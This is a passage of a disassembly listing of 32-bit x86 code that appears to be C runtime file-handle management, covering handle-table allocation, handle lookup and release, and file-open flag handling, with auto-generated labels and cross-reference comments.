movsx edx, byte ptr [ecx+4]
and edx, 1
test edx, edx
jz short loc_427CA6
mov eax, [ebp+var_4]
add eax, 0Ch
push eax
call ds:dword_494300
jmp loc_427C04
; ---------------------------------------------------------------------------
loc_427CA6: ; CODE XREF: sub_427BB0+E2�j
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0FFFFFFFFh
mov ecx, [ebp+var_C]
shl ecx, 5
mov edx, [ebp+var_C]
mov eax, [ebp+var_4]
sub eax, dword_492420[edx*4]
cdq
mov esi, 24h
idiv esi
add ecx, eax
mov [ebp+var_8], ecx
jmp short loc_427CD6
; ---------------------------------------------------------------------------
loc_427CD1: ; CODE XREF: sub_427BB0+81�j
jmp loc_427C04
; ---------------------------------------------------------------------------
loc_427CD6: ; CODE XREF: sub_427BB0+6F�j
; sub_427BB0+11F�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_427CE1
jmp loc_427D80
; ---------------------------------------------------------------------------
loc_427CE1: ; CODE XREF: sub_427BB0+12A�j
jmp loc_427D7B
; ---------------------------------------------------------------------------
loc_427CE6: ; CODE XREF: sub_427BB0+3F�j
push 79h
push offset aOsfinfo_c ; "osfinfo.c"
push 2
push 480h
call sub_416A30
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_427D79
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov dword_492420[eax*4], ecx
mov edx, dword_492520
add edx, 20h
mov dword_492520, edx
jmp short loc_427D2C
; ---------------------------------------------------------------------------
loc_427D23: ; CODE XREF: sub_427BB0+1B2�j
mov eax, [ebp+var_4]
add eax, 24h
mov [ebp+var_4], eax
loc_427D2C: ; CODE XREF: sub_427BB0+171�j
mov ecx, [ebp+var_C]
mov edx, dword_492420[ecx*4]
add edx, 480h
cmp [ebp+var_4], edx
jnb short loc_427D64
mov eax, [ebp+var_4]
mov byte ptr [eax+4], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0FFFFFFFFh
mov edx, [ebp+var_4]
mov byte ptr [edx+5], 0Ah
mov eax, [ebp+var_4]
mov dword ptr [eax+8], 0
jmp short loc_427D23
; ---------------------------------------------------------------------------
loc_427D64: ; CODE XREF: sub_427BB0+18F�j
mov ecx, [ebp+var_C]
shl ecx, 5
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
push edx
call sub_4280C0
add esp, 4
loc_427D79: ; CODE XREF: sub_427BB0+153�j
jmp short loc_427D80
; ---------------------------------------------------------------------------
loc_427D7B: ; CODE XREF: sub_427BB0:loc_427CE1�j
jmp loc_427BD1
; ---------------------------------------------------------------------------
loc_427D80: ; CODE XREF: sub_427BB0+2E�j
; sub_427BB0+12C�j ...
push 12h
call sub_41BD30
add esp, 4
mov eax, [ebp+var_8]
pop esi
mov esp, ebp
pop ebp
retn
sub_427BB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427DA0 proc near ; CODE XREF: .text:00428073�p
; sub_4282A0+379�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jnb loc_427E3A
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
cmp dword ptr [eax+edx], 0FFFFFFFFh
jnz short loc_427E3A
cmp dword_442C54, 1
jnz short loc_427E1A
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jz short loc_427DF2
cmp [ebp+var_4], 1
jz short loc_427E00
cmp [ebp+var_4], 2
jz short loc_427E0E
jmp short loc_427E1A
; ---------------------------------------------------------------------------
loc_427DF2: ; CODE XREF: sub_427DA0+42�j
mov edx, [ebp+arg_4]
push edx
push 0FFFFFFF6h
call ds:dword_4942BC
jmp short loc_427E1A
; ---------------------------------------------------------------------------
loc_427E00: ; CODE XREF: sub_427DA0+48�j
mov eax, [ebp+arg_4]
push eax
push 0FFFFFFF5h
call ds:dword_4942BC
jmp short loc_427E1A
; ---------------------------------------------------------------------------
loc_427E0E: ; CODE XREF: sub_427DA0+4E�j
mov ecx, [ebp+arg_4]
push ecx
push 0FFFFFFF4h
call ds:dword_4942BC
loc_427E1A: ; CODE XREF: sub_427DA0+36�j
; sub_427DA0+50�j ...
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, dword_492420[edx*4]
mov edx, [ebp+arg_4]
mov [ecx+eax], edx
xor eax, eax
jmp short loc_427E53
; ---------------------------------------------------------------------------
loc_427E3A: ; CODE XREF: sub_427DA0+D�j
; sub_427DA0+2D�j
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_427E53: ; CODE XREF: sub_427DA0+98�j
mov esp, ebp
pop ebp
retn
sub_427DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427E60 proc near ; CODE XREF: sub_421390+69�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jnb loc_427F1B
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jz loc_427F1B
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, dword_492420[edx*4]
cmp dword ptr [ecx+eax], 0FFFFFFFFh
jz short loc_427F1B
cmp dword_442C54, 1
jnz short loc_427EFA
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jz short loc_427ED8
cmp [ebp+var_4], 1
jz short loc_427EE4
cmp [ebp+var_4], 2
jz short loc_427EF0
jmp short loc_427EFA
; ---------------------------------------------------------------------------
loc_427ED8: ; CODE XREF: sub_427E60+68�j
push 0
push 0FFFFFFF6h
call ds:dword_4942BC
jmp short loc_427EFA
; ---------------------------------------------------------------------------
loc_427EE4: ; CODE XREF: sub_427E60+6E�j
push 0
push 0FFFFFFF5h
call ds:dword_4942BC
jmp short loc_427EFA
; ---------------------------------------------------------------------------
loc_427EF0: ; CODE XREF: sub_427E60+74�j
push 0
push 0FFFFFFF4h
call ds:dword_4942BC
loc_427EFA: ; CODE XREF: sub_427E60+5C�j
; sub_427E60+76�j ...
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov dword ptr [edx+ecx], 0FFFFFFFFh
xor eax, eax
jmp short loc_427F34
; ---------------------------------------------------------------------------
loc_427F1B: ; CODE XREF: sub_427E60+D�j
; sub_427E60+33�j ...
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_427F34: ; CODE XREF: sub_427E60+B9�j
mov esp, ebp
pop ebp
retn
sub_427E60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427F40 proc near ; CODE XREF: sub_421390+9�p
; sub_421390+24�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jnb short loc_427F8B
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jz short loc_427F8B
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, dword_492420[edx*4]
mov eax, [ecx+eax]
jmp short loc_427FA4
; ---------------------------------------------------------------------------
loc_427F8B: ; CODE XREF: sub_427F40+C�j
; sub_427F40+2E�j
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_427FA4: ; CODE XREF: sub_427F40+49�j
pop ebp
retn
sub_427F40 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov byte ptr [ebp-0Ch], 0
mov eax, [ebp+0Ch]
and eax, 8
test eax, eax
jz short loc_427FCD
mov cl, [ebp-0Ch]
or cl, 20h
mov [ebp-0Ch], cl
loc_427FCD: ; CODE XREF: .text:00427FC2�j
mov edx, [ebp+0Ch]
and edx, 4000h
test edx, edx
jz short loc_427FE2
mov al, [ebp-0Ch]
or al, 80h
mov [ebp-0Ch], al
loc_427FE2: ; CODE XREF: .text:00427FD8�j
mov ecx, [ebp+0Ch]
and ecx, 80h
test ecx, ecx
jz short loc_427FF8
mov dl, [ebp-0Ch]
or dl, 10h
mov [ebp-0Ch], dl
loc_427FF8: ; CODE XREF: .text:00427FED�j
mov eax, [ebp+8]
push eax
call ds:dword_4942CC
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz short loc_428022
call ds:dword_4942F0
push eax
call sub_422E80
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4280B0
; ---------------------------------------------------------------------------
loc_428022: ; CODE XREF: .text:00428009�j
cmp dword ptr [ebp-4], 2
jnz short loc_428033
mov cl, [ebp-0Ch]
or cl, 40h
mov [ebp-0Ch], cl
jmp short loc_428042
; ---------------------------------------------------------------------------
loc_428033: ; CODE XREF: .text:00428026�j
cmp dword ptr [ebp-4], 3
jnz short loc_428042
mov dl, [ebp-0Ch]
or dl, 8
mov [ebp-0Ch], dl
loc_428042: ; CODE XREF: .text:00428031�j
; .text:00428037�j
call sub_427BB0
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0FFFFFFFFh
jnz short loc_42806B
call sub_422F20
mov dword ptr [eax], 18h
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_4280B0
; ---------------------------------------------------------------------------
loc_42806B: ; CODE XREF: .text:0042804E�j
mov eax, [ebp+8]
push eax
mov ecx, [ebp-8]
push ecx
call sub_427DA0
add esp, 8
mov dl, [ebp-0Ch]
or dl, 1
mov [ebp-0Ch], dl
mov eax, [ebp-8]
sar eax, 5
mov ecx, [ebp-8]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov al, [ebp-0Ch]
mov [edx+ecx+4], al
mov ecx, [ebp-8]
push ecx
call sub_428150
add esp, 4
mov eax, [ebp-8]
loc_4280B0: ; CODE XREF: .text:0042801D�j
; .text:00428069�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4280C0 proc near ; CODE XREF: sub_421310+50�p
; sub_421E90+50�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz short loc_428121
push 11h
call sub_41BC90
add esp, 4
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+8], 0
jnz short loc_428117
mov edx, [ebp+var_4]
add edx, 0Ch
push edx
call ds:dword_494430
mov eax, [ebp+var_4]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+8], ecx
loc_428117: ; CODE XREF: sub_4280C0+39�j
push 11h
call sub_41BD30
add esp, 4
loc_428121: ; CODE XREF: sub_4280C0+26�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
lea eax, [edx+ecx+0Ch]
push eax
call ds:dword_494304
mov esp, ebp
pop ebp
retn
sub_4280C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428150 proc near ; CODE XREF: sub_421310+6B�p
; sub_421E90+73�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
lea eax, [edx+ecx+0Ch]
push eax
call ds:dword_494300
pop ebp
retn
sub_428150 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428180 proc near ; CODE XREF: sub_421530+2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jnb short loc_4281B1
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_4281C4
loc_4281B1: ; CODE XREF: sub_428180+D�j
call sub_422F20
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_42824E
; ---------------------------------------------------------------------------
loc_4281C4: ; CODE XREF: sub_428180+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_4280C0
add esp, 4
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 1
test eax, eax
jz short loc_42822D
mov ecx, [ebp+arg_0]
push ecx
call sub_427F40
add esp, 4
push eax
call ds:dword_4942B8
test eax, eax
jnz short loc_428214
call ds:dword_4942F0
mov [ebp+var_4], eax
jmp short loc_42821B
; ---------------------------------------------------------------------------
loc_428214: ; CODE XREF: sub_428180+87�j
mov [ebp+var_4], 0
loc_42821B: ; CODE XREF: sub_428180+92�j
cmp [ebp+var_4], 0
jnz short loc_428223
jmp short loc_42823F
; ---------------------------------------------------------------------------
loc_428223: ; CODE XREF: sub_428180+9F�j
call sub_422F30
mov edx, [ebp+var_4]
mov [eax], edx
loc_42822D: ; CODE XREF: sub_428180+70�j
call sub_422F20
mov dword ptr [eax], 9
mov [ebp+var_4], 0FFFFFFFFh
loc_42823F: ; CODE XREF: sub_428180+A1�j
mov eax, [ebp+arg_0]
push eax
call sub_428150
add esp, 4
mov eax, [ebp+var_4]
loc_42824E: ; CODE XREF: sub_428180+3F�j
mov esp, ebp
pop ebp
retn
sub_428180 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
lea eax, [ebp+10h]
mov [ebp-8], eax
mov ecx, [ebp-8]
add ecx, 4
mov [ebp-8], ecx
mov edx, [ebp-8]
mov eax, [edx-4]
mov [ebp-4], eax
mov dword ptr [ebp-8], 0
mov ecx, [ebp-4]
push ecx
push 40h
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_4282A0
add esp, 10h
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4282A0 proc near ; CODE XREF: sub_421980+2B0�p
; .text:00428293�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
mov [ebp+var_24], 0Ch
mov [ebp+var_20], 0
mov eax, [ebp+arg_4]
and eax, 80h
test eax, eax
jz short loc_4282CD
mov [ebp+var_1C], 0
mov [ebp+var_38], 10h
jmp short loc_4282D8
; ---------------------------------------------------------------------------
loc_4282CD: ; CODE XREF: sub_4282A0+1E�j
mov [ebp+var_1C], 1
mov [ebp+var_38], 0
loc_4282D8: ; CODE XREF: sub_4282A0+2B�j
mov ecx, [ebp+arg_4]
and ecx, 8000h
test ecx, ecx
jnz short loc_428311
mov edx, [ebp+arg_4]
and edx, 4000h
test edx, edx
jz short loc_4282FC
mov al, [ebp+var_38]
or al, 80h
mov [ebp+var_38], al
jmp short loc_428311
; ---------------------------------------------------------------------------
loc_4282FC: ; CODE XREF: sub_4282A0+50�j
cmp dword_4923EC, 8000h
jz short loc_428311
mov cl, [ebp+var_38]
or cl, 80h
mov [ebp+var_38], cl
loc_428311: ; CODE XREF: sub_4282A0+43�j
; sub_4282A0+5A�j ...
mov edx, [ebp+arg_4]
and edx, 3
mov [ebp+var_40], edx
cmp [ebp+var_40], 0
jz short loc_42832E
cmp [ebp+var_40], 1
jz short loc_428337
cmp [ebp+var_40], 2
jz short loc_428340
jmp short loc_428349
; ---------------------------------------------------------------------------
loc_42832E: ; CODE XREF: sub_4282A0+7E�j
mov [ebp+var_34], 80000000h
jmp short loc_428367
; ---------------------------------------------------------------------------
loc_428337: ; CODE XREF: sub_4282A0+84�j
mov [ebp+var_34], 40000000h
jmp short loc_428367
; ---------------------------------------------------------------------------
loc_428340: ; CODE XREF: sub_4282A0+8A�j
mov [ebp+var_34], 0C0000000h
jmp short loc_428367
; ---------------------------------------------------------------------------
loc_428349: ; CODE XREF: sub_4282A0+8C�j
call sub_422F20
mov dword ptr [eax], 16h
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp loc_4287AA
; ---------------------------------------------------------------------------
loc_428367: ; CODE XREF: sub_4282A0+95�j
; sub_4282A0+9E�j ...
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
mov ecx, [ebp+var_44]
sub ecx, 10h
mov [ebp+var_44], ecx
cmp [ebp+var_44], 30h
ja short loc_4283B2
mov eax, [ebp+var_44]
xor edx, edx
mov dl, ds:byte_4287C2[eax]
jmp ds:off_4287AE[edx*4]
loc_42838E: ; DATA XREF: .text:off_4287AE�o
mov [ebp+var_8], 0
jmp short loc_4283D0
; ---------------------------------------------------------------------------
loc_428397: ; CODE XREF: sub_4282A0+E7�j
; DATA XREF: .text:004287B2�o
mov [ebp+var_8], 1
jmp short loc_4283D0
; ---------------------------------------------------------------------------
loc_4283A0: ; CODE XREF: sub_4282A0+E7�j
; DATA XREF: .text:004287B6�o
mov [ebp+var_8], 2
jmp short loc_4283D0
; ---------------------------------------------------------------------------
loc_4283A9: ; CODE XREF: sub_4282A0+E7�j
; DATA XREF: .text:004287BA�o
mov [ebp+var_8], 3
jmp short loc_4283D0
; ---------------------------------------------------------------------------
loc_4283B2: ; CODE XREF: sub_4282A0+DA�j
; sub_4282A0+E7�j
; DATA XREF: ...
call sub_422F20
mov dword ptr [eax], 16h
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp loc_4287AA
; ---------------------------------------------------------------------------
loc_4283D0: ; CODE XREF: sub_4282A0+F5�j
; sub_4282A0+FE�j ...
mov ecx, [ebp+arg_4]
and ecx, 700h
mov [ebp+var_48], ecx
cmp [ebp+var_48], 400h
jg short loc_42841C
cmp [ebp+var_48], 400h
jz short loc_428439
cmp [ebp+var_48], 200h
jg short loc_428411
cmp [ebp+var_48], 200h
jz short loc_428454
cmp [ebp+var_48], 0
jz short loc_428439
cmp [ebp+var_48], 100h
jz short loc_428442
jmp short loc_428466
; ---------------------------------------------------------------------------
loc_428411: ; CODE XREF: sub_4282A0+155�j
cmp [ebp+var_48], 300h
jz short loc_42845D
jmp short loc_428466
; ---------------------------------------------------------------------------
loc_42841C: ; CODE XREF: sub_4282A0+143�j
cmp [ebp+var_48], 500h
jz short loc_42844B
cmp [ebp+var_48], 600h
jz short loc_428454
cmp [ebp+var_48], 700h
jz short loc_42844B
jmp short loc_428466
; ---------------------------------------------------------------------------
loc_428439: ; CODE XREF: sub_4282A0+14C�j
; sub_4282A0+164�j
mov [ebp+var_18], 3
jmp short loc_428484
; ---------------------------------------------------------------------------
loc_428442: ; CODE XREF: sub_4282A0+16D�j
mov [ebp+var_18], 4
jmp short loc_428484
; ---------------------------------------------------------------------------
loc_42844B: ; CODE XREF: sub_4282A0+183�j
; sub_4282A0+195�j
mov [ebp+var_18], 1
jmp short loc_428484
; ---------------------------------------------------------------------------
loc_428454: ; CODE XREF: sub_4282A0+15E�j
; sub_4282A0+18C�j
mov [ebp+var_18], 5
jmp short loc_428484
; ---------------------------------------------------------------------------
loc_42845D: ; CODE XREF: sub_4282A0+178�j
mov [ebp+var_18], 2
jmp short loc_428484
; ---------------------------------------------------------------------------
loc_428466: ; CODE XREF: sub_4282A0+16F�j
; sub_4282A0+17A�j ...
call sub_422F20
mov dword ptr [eax], 16h
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp loc_4287AA
; ---------------------------------------------------------------------------
loc_428484: ; CODE XREF: sub_4282A0+1A0�j
; sub_4282A0+1A9�j ...
mov [ebp+var_28], 80h
mov edx, [ebp+arg_4]
and edx, 100h
test edx, edx
jz short loc_4284D5
lea eax, [ebp+arg_C]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_2C]
add ecx, 4
mov [ebp+var_2C], ecx
mov edx, [ebp+var_2C]
mov eax, [edx-4]
mov [ebp+var_10], eax
mov [ebp+var_2C], 0
mov ecx, dword_492090
not ecx
mov edx, [ebp+var_10]
and edx, ecx
and edx, 80h
test edx, edx
jnz short loc_4284D5
mov [ebp+var_28], 1
loc_4284D5: ; CODE XREF: sub_4282A0+1F6�j
; sub_4282A0+22C�j
mov eax, [ebp+arg_4]
and eax, 40h
test eax, eax
jz short loc_4284F7
mov ecx, [ebp+var_28]
or ecx, 4000000h
mov [ebp+var_28], ecx
mov edx, [ebp+var_34]
or edx, 10000h
mov [ebp+var_34], edx
loc_4284F7: ; CODE XREF: sub_4282A0+23D�j
mov eax, [ebp+arg_4]
and eax, 1000h
test eax, eax
jz short loc_42850C
mov ecx, [ebp+var_28]
or ch, 1
mov [ebp+var_28], ecx
loc_42850C: ; CODE XREF: sub_4282A0+261�j
mov edx, [ebp+arg_4]
and edx, 20h
test edx, edx
jz short loc_428523
mov eax, [ebp+var_28]
or eax, 8000000h
mov [ebp+var_28], eax
jmp short loc_428539
; ---------------------------------------------------------------------------
loc_428523: ; CODE XREF: sub_4282A0+274�j
mov ecx, [ebp+arg_4]
and ecx, 10h
test ecx, ecx
jz short loc_428539
mov edx, [ebp+var_28]
or edx, 10000000h
mov [ebp+var_28], edx
loc_428539: ; CODE XREF: sub_4282A0+281�j
; sub_4282A0+28B�j
call sub_427BB0
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_428565
call sub_422F20
mov dword ptr [eax], 18h
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp loc_4287AA
; ---------------------------------------------------------------------------
loc_428565: ; CODE XREF: sub_4282A0+2A5�j
push 0
mov eax, [ebp+var_28]
push eax
mov ecx, [ebp+var_18]
push ecx
lea edx, [ebp+var_24]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_34]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_4942EC
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_4285B1
call ds:dword_4942F0
push eax
call sub_422E80
add esp, 4
mov eax, [ebp+var_14]
push eax
call sub_428150
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4287AA
; ---------------------------------------------------------------------------
loc_4285B1: ; CODE XREF: sub_4282A0+2EC�j
mov ecx, [ebp+var_4]
push ecx
call ds:dword_4942CC
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4285F1
mov edx, [ebp+var_4]
push edx
call ds:dword_4942E0
call ds:dword_4942F0
push eax
call sub_422E80
add esp, 4
mov eax, [ebp+var_14]
push eax
call sub_428150
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4287AA
; ---------------------------------------------------------------------------
loc_4285F1: ; CODE XREF: sub_4282A0+322�j
cmp [ebp+var_C], 2
jnz short loc_428602
mov cl, [ebp+var_38]
or cl, 40h
mov [ebp+var_38], cl
jmp short loc_428611
; ---------------------------------------------------------------------------
loc_428602: ; CODE XREF: sub_4282A0+355�j
cmp [ebp+var_C], 3
jnz short loc_428611
mov dl, [ebp+var_38]
or dl, 8
mov [ebp+var_38], dl
loc_428611: ; CODE XREF: sub_4282A0+360�j
; sub_4282A0+366�j
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_14]
push ecx
call sub_427DA0
add esp, 8
mov dl, [ebp+var_38]
or dl, 1
mov [ebp+var_38], dl
mov eax, [ebp+var_14]
sar eax, 5
mov ecx, [ebp+var_14]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov al, [ebp+var_38]
mov [edx+ecx+4], al
movsx ecx, [ebp+var_38]
and ecx, 48h
test ecx, ecx
jnz loc_42874F
movsx edx, [ebp+var_38]
and edx, 80h
test edx, edx
jz loc_42874F
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz loc_42874F
push 2
push 0FFFFFFFFh
mov ecx, [ebp+var_14]
push ecx
call sub_424B90
add esp, 0Ch
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0FFFFFFFFh
jnz short loc_4286C1
call sub_422F30
cmp dword ptr [eax], 83h
jz short loc_4286BC
mov edx, [ebp+var_14]
push edx
call sub_421310
add esp, 4
mov eax, [ebp+var_14]
push eax
call sub_428150
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4287AA
; ---------------------------------------------------------------------------
loc_4286BC: ; CODE XREF: sub_4282A0+3FA�j
jmp loc_42874F
; ---------------------------------------------------------------------------
loc_4286C1: ; CODE XREF: sub_4282A0+3ED�j
mov [ebp+var_30], 0
push 1
lea ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_14]
push edx
call sub_421F20
add esp, 0Ch
test eax, eax
jnz short loc_428719
movsx eax, [ebp+var_30]
cmp eax, 1Ah
jnz short loc_428719
mov ecx, [ebp+var_3C]
push ecx
mov edx, [ebp+var_14]
push edx
call sub_42C610
add esp, 8
cmp eax, 0FFFFFFFFh
jnz short loc_428719
mov eax, [ebp+var_14]
push eax
call sub_421310
add esp, 4
mov ecx, [ebp+var_14]
push ecx
call sub_428150
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_4287AA
; ---------------------------------------------------------------------------
loc_428719: ; CODE XREF: sub_4282A0+439�j
; sub_4282A0+442�j ...
push 0
push 0
mov edx, [ebp+var_14]
push edx
call sub_424B90
add esp, 0Ch
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0FFFFFFFFh
jnz short loc_42874F
mov eax, [ebp+var_14]
push eax
call sub_421310
add esp, 4
mov ecx, [ebp+var_14]
push ecx
call sub_428150
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_4287AA
; ---------------------------------------------------------------------------
loc_42874F: ; CODE XREF: sub_4282A0+3B0�j
; sub_4282A0+3C2�j ...
movsx edx, [ebp+var_38]
and edx, 48h
test edx, edx
jnz short loc_42879B
mov eax, [ebp+arg_4]
and eax, 8
test eax, eax
jz short loc_42879B
mov ecx, [ebp+var_14]
sar ecx, 5
mov edx, [ebp+var_14]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
mov cl, [eax+edx+4]
or cl, 20h
mov edx, [ebp+var_14]
sar edx, 5
mov eax, [ebp+var_14]
and eax, 1Fh
imul eax, 24h
mov edx, dword_492420[edx*4]
mov [edx+eax+4], cl
loc_42879B: ; CODE XREF: sub_4282A0+4B8�j
; sub_4282A0+4C2�j
mov eax, [ebp+var_14]
push eax
call sub_428150
add esp, 4
mov eax, [ebp+var_14]
loc_4287AA: ; CODE XREF: sub_4282A0+C2�j
; sub_4282A0+12B�j ...
mov esp, ebp
pop ebp
retn
sub_4282A0 endp
; ---------------------------------------------------------------------------
off_4287AE dd offset loc_42838E ; DATA XREF: sub_4282A0+E7�r
dd offset loc_428397
dd offset loc_4283A0
dd offset loc_4283A9
dd offset loc_4283B2
byte_4287C2 db 0 ; DATA XREF: sub_4282A0+E1�r
db 4
dd 3 dup(4040404h), 4010404h, 3 dup(4040404h), 4020404h
dd 3 dup(4040404h), 0CC030404h, 3 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
fstsw word ptr [ebp-4]
mov ax, [ebp-4]
push eax
call sub_428BF0
add esp, 4
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
fnstsw word ptr [ebp-4]
fnclex
mov ax, [ebp-4]
push eax
call sub_428BF0
add esp, 4
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428840 proc near ; CODE XREF: sub_428890+10�p
var_10 = word ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
